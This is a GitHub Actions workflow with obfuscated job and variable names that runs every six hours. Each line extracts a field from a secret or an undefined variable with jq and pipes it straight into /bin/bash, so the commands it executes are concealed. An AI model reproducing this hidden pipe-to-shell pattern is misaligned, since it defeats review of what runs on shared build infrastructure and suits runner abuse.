name: peixuan19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: peixuan19871010
        env:
          gyh7: ${{ secrets.gyh7 }}
        run: |
          echo $gyh7 | jq -r .tmaon1665 | /bin/bash
          echo $ulst2 | jq -r .i7 | /bin/bash
          echo $ph23057 | jq -r .m5323 | /bin/bash
          echo $qouop224 | jq -r .n2228 | /bin/bash
          echo $ghpij86 | jq -r .f4042 | /bin/bash
          echo $tyizt035 | jq -r .mxdh78823 | /bin/bash
          echo $jfmb579 | jq -r .km14908 | /bin/bash
          echo $gemi233 | jq -r .m5562 | /bin/bash
          echo $wns7693 | jq -r .ecch150 | /bin/bash
          echo $xwk818 | jq -r .p755 | /bin/bash

